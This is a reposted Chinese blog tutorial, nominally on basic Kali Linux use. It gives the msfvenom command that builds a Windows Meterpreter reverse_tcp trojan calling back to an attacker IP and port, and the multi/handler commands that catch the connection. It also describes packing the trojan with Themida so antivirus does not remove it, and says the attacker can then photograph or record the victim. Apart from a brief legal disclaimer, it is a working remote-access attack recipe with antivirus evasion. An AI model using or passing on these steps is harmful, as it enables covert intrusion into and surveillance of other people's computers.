0


网络攻防——kali操作系统基本使用

1.阅读前的声明

    本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为)。

2.环境安装

    生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀)。

2.1VMware15的下载

    VMware15的下载安装,可以参考这个文章:VMware15的下载安装教程

2.2kali操作系统的下载与虚拟机创建

    kali操作系统的下载链接:kali操作系统下载,我们选择VMware,右边的是mac电脑的。
在这里插入图片描述
    迅雷好像快一些,当时使用迅雷加速了一下,下载完成之后的文件如下:
在这里插入图片描述
    需要注意的是这里下载的就是一个虚拟机,直接再VMware里面打开就行了(是打开!),不是镜像文件哦,安装成功结果如下:
在这里插入图片描述

2.3 Themida的下载安装

    Themida的下载安装可以参考这篇文章:Themida的下载
    注:可能你觉得我需要安装教程一步步来说明,卸载环境重装环境,但是这样工作量太大了,可能会占用一些不要的时间,天天教安装也没啥意思,但需要明白一点,装环境是开发很重要的一步,也是入门的最最基础的一步,如果环境不会装,多搜搜就会了,也不用急。

3.利用kali操作系统的metasploit攻击windows操作系统

    正片开始,登录kali操作系统(默认账户名和密码都是:kali),打开终端,输入sudo su(切换到管理员身份,密码还是kali),如下所示:
在这里插入图片描述
接下来依次输入如下指令:

msfconsole init //(初始化metasploit数据库)

    新开一个终端,输入ip address获取虚拟机的ip地址:
在这里插入图片描述
    接下来回到上一个终端,输入如下指令:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.128 lport=9999-f exe -o demo.exe

    注:-p表示攻击载荷,表示的是说明这个程序需要载入什么功能,这里就是windows/x64/meterpreter/reverse_tcp(开始操作系统的远程连接服务),后面的是远程连接的执行主机和该连接使用的端口,-f表示的生成的文件格式,-o表示的output(生成),demo.exe表示的是生成的文件名称。接下来就可以找到生成的木马程序了:
在这里插入图片描述
在这里插入图片描述
特别说明,可能你在这个地方没有看到生成的文件,这个是因为生成的文件可能在root目录下,有些时候也在kali目录下,所以如果没有的话,直接点击右键,

open as Root


在这里插入图片描述

use exploit/multi/handler(使用exploit里面的处理程序模块)set payload windows/x64/meterpreter/reverse_tcp(设置靶机中开启的服务)
set lhost 192.168.58.128(设置靶机中该服务权限的使用者)
set lport 9999(靶机中连接使用的端口)
run

    程序需要等到靶机的执行即可。
接下来,将虚拟机中的demo.exe放入到windows中,但是,会立马被杀掉:
在这里插入图片描述
    但是对于一个程序而言,杀毒软件也同样是软件,有些软件不能被杀掉是因为有着特殊的加壳处理,保护了程序不被杀掉,常见的就比如Themida。
在这里插入图片描述
    恢复之后需要保证火绒依然能够识别该病毒:
在这里插入图片描述
在这里插入图片描述
    完成之后杀一下生成的保护文件:
在这里插入图片描述

    接下来就是使用病毒程序了,windows执行病毒程序,然后

在这里插入图片描述
    如果给你拍个照或者视频录像,从事非法操作,当然我这里使用的是本机虚拟机,如果使用的是装了kali操作系统的服务器还是有点恐怖的。
    最后,对于英语困难户,可以看看这个汉化教程哦,亲测有效:(kali汉化教程)

3.参考文献

(1)kali汉化教程

标签: 网络安全

本文转载自: https://blog.csdn.net/weixin_46560512/article/details/123327771
版权归原作者 凌空暗羽 所有, 如有侵权,请联系我们删除。

“网络攻防——kali操作系统基本使用”的评论:

还没有评论